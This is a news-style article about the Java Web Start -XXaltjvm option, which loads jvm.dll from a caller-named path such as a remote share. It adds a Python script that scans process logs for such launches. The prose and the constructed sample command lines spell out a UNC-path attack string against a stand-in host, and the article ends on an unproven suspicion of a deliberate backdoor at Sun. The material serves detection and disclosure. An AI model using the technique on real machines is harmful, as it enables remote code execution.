Backdoor found in JavaWS

A serious vulnerability has been found in the Java Web Start framework: the undocumented parameter -XXaltjvm (and its -J-XXaltjvm form, where the -J prefix hands the option through javaws to the underlying Java launcher) makes it load an alternative JavaVM library (jvm.dll or libjvm.so) from any location the caller names. In practice an attacker can pass an option of the form -XXaltjvm=\\IP\evil, pointing at a share under their control, and have their own jvm.dll loaded and executed on any Windows machine that runs it.
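The defensive side of the mechanism above, as an added example that is not part of the original article or Sun's code: a small Python detector that reads Windows process-creation records and flags javaws.exe launches whose -XXaltjvm or -J-XXaltjvm value points outside the JRE, with a UNC path as the worst case. It assumes records with the fields "ts", "image", "cmdline" and "parent" (what Sysmon event 1 or Security event 4688 give you after normalisation) and that the option value names a directory from which jvm.dll is loaded; a bare name such as client or server is treated as the legitimate variant selector. The sample records, hostnames and addresses are constructed.

```python
"""Flag javaws.exe launches that point -XXaltjvm / -J-XXaltjvm outside the JRE.

Added example for this article; not code from the original page or from Sun.
Assumes process-creation records with "ts", "image", "cmdline" and "parent"
fields, and that the -XXaltjvm value names the directory jvm.dll is loaded
from. All sample records, hosts and addresses below are constructed.
"""
import re
from typing import Dict, List, Optional

# Both spellings: the -J- prefix hands the option through javaws to the launcher.
ALTJVM_RE = re.compile(r"^-(?:J-)?XXaltjvm[=:](.+)$", re.IGNORECASE)
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "safari.exe"}


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows argv splitter: whitespace separates, double quotes group."""
    args, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def jre_root_from_image(image: str) -> str:
    """<jre>\\bin\\javaws.exe -> <jre>, lower-cased for comparison."""
    parts = re.split(r"[\\/]", image)
    return "\\".join(parts[:-2]).lower()


def classify_altjvm_value(value: str, jre_root: str) -> Optional[str]:
    """Return a reason string when the value is suspicious, else None."""
    v = value.strip().replace("/", "\\")
    if v.startswith("\\\\"):
        return "UNC path: jvm.dll would be loaded from a remote share"
    if "\\" not in v:
        return None  # bare variant name (client/server), resolved under <jre>\bin
    if re.match(r"^[a-z]:\\", v, re.IGNORECASE):
        if v.lower().startswith(jre_root + "\\"):
            return None  # absolute path, but still inside this JRE
        return "absolute path outside the JRE directory"
    return "relative path with separators (can walk out of <jre>\\bin)"


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per suspicious -XXaltjvm argument on a javaws.exe launch."""
    findings = []
    for ev in events:
        if basename(ev["image"]) != "javaws.exe":
            continue
        jre_root = jre_root_from_image(ev["image"])
        for arg in split_windows_cmdline(ev["cmdline"]):
            m = ALTJVM_RE.match(arg)
            if not m:
                continue
            reason = classify_altjvm_value(m.group(1), jre_root)
            if reason is None:
                continue
            # A browser as parent is the drive-by case the article describes.
            severity = "high" if basename(ev["parent"]) in BROWSERS else "medium"
            findings.append({"ts": ev["ts"], "path": m.group(1),
                             "reason": reason, "severity": severity})
    return findings


JAVAWS_IMAGE = r"C:\Program Files\Java\jre6\bin\javaws.exe"
JAVAWS = '"' + JAVAWS_IMAGE + '"'
SAMPLE_EVENTS = [  # constructed records; 192.0.2.0/24 and 203.0.113.0/24 are documentation ranges
    {"ts": "t1", "image": JAVAWS_IMAGE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": JAVAWS + " -Xnosplash http://intranet.example/app.jnlp"},
    {"ts": "t2", "image": JAVAWS_IMAGE, "parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": JAVAWS + r" -J-XXaltjvm=\\192.0.2.10\share\evil http://203.0.113.5/x.jnlp"},
    {"ts": "t3", "image": JAVAWS_IMAGE, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": JAVAWS + r" -XXaltjvm=C:\Users\Public\tmp http://203.0.113.5/x.jnlp"},
    {"ts": "t4", "image": JAVAWS_IMAGE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": JAVAWS + " -XXaltjvm=server http://intranet.example/app.jnlp"},
    {"ts": "t5", "image": JAVAWS_IMAGE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": JAVAWS + r' "-J-XXaltjvm=C:\Program Files\Java\jre6\bin\client" http://intranet.example/app.jnlp'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['ts']}: -XXaltjvm -> {f['path']} ({f['reason']})")
```

Run as a script it reports t2 and t3 and stays quiet on the launches that use a bare variant name or a directory inside the JRE. Anything a browser spawns with a UNC value deserves the same response as a confirmed drive-by: isolate the host and look for the share in proxy and SMB logs.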

Since JavaWS ships as part of the JRE, the vulnerability affects every major browser, including Opera, Firefox, IE and Chrome. At the moment it is present only in the Windows builds; in Java SE 6 it was closed several releases ago.

According to the researchers who documented this vulnerability in detail, it has been present in JavaWS for a very long time, at least several years. There is even the uncomfortable suspicion that someone at Sun added this "feature" deliberately for some purpose: it looks far too much like a purposely designed backdoor.